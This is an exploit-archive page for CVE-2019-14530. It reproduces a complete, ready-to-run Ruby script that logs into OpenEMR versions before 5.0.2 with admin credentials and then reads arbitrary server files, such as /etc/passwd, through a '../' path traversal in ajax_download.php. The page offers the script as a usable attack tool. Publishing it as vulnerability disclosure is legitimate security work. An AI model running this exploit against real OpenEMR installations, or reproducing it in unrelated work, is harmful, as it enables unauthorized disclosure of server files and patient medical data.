OpenEMR 5.0.1.7 Path Traversal

OpenEMR 5.0.1.7 Path Traversal: Posted Jul 5, 2021; Authored by Alexandre Zanni; OpenEMR version 5.0.17 path traversal exploit.; tags | exploit, file inclusion; advisories | CVE-2019-14530; SHA-256 | d922d48e6a0bee902e565673aa1c4471cc5327d78c48154ce121df3691d4e7ac; Download | Favorite | View

OpenEMR 5.0.1.7 Path Traversal

# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)
# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530
# Date: 2021-06-24
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz
# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml
# Version: < 5.0.2 (it means up to 5.0.1.7)
# Tested on: OpenEMR Version 5.0.1
# References: https://www.exploit-db.com/exploits/50037
# CVE: CVE-2019-14530
# CWE: CWE-22
# Patch: https://github.com/openemr/openemr/pull/2592/files

#!/usr/bin/env ruby

require 'pathname'
require 'httpx'
require 'docopt'

doc = <<~DOCOPT
  OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure

  Source: https://github.com/sec-it/exploit-CVE-2019-14530

  Usage:
    #{__FILE__} exploit <url> <filename> <username> <password> [--debug]
    #{__FILE__} -h | --help

  Options:
    <url>       Root URL (base path) including HTTP scheme, port and root folder
    <filename>  Filename of the file to be read
    <username>  Username of the admin
    <password>  Password of the admin
    --debug     Display arguments
    -h, --help  Show this screen

  Examples:
    #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass
    #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass
DOCOPT

def login(root_url, user, pass, http)
  vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default"
  params = {
    'new_login_session_management' => '1',
    'authProvider' => 'Default',
    'authUser' => user,
    'clearPass' => pass,
    'languageChoice' => '1'
  }

  http.post(vuln_url, form: params).body.to_s
end

def exploit(root_url, filename, http)
  vuln_url = "#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}"

  http.get(vuln_url).body.to_s
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  if args['exploit']
    http = HTTPX.plugin(:cookies).plugin(:follow_redirects)
    login(args['<url>'], args['<username>'], args['<password>'], http)
    puts exploit(args['<url>'], args['<filename>'], http)
  end
rescue Docopt::Exit => e
  puts e.message
end

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

OpenEMR 5.0.1.7 Path Traversal

OpenEMR 5.0.1.7 Path Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OpenEMR 5.0.1.7 Path Traversal

Share This

OpenEMR 5.0.1.7 Path Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems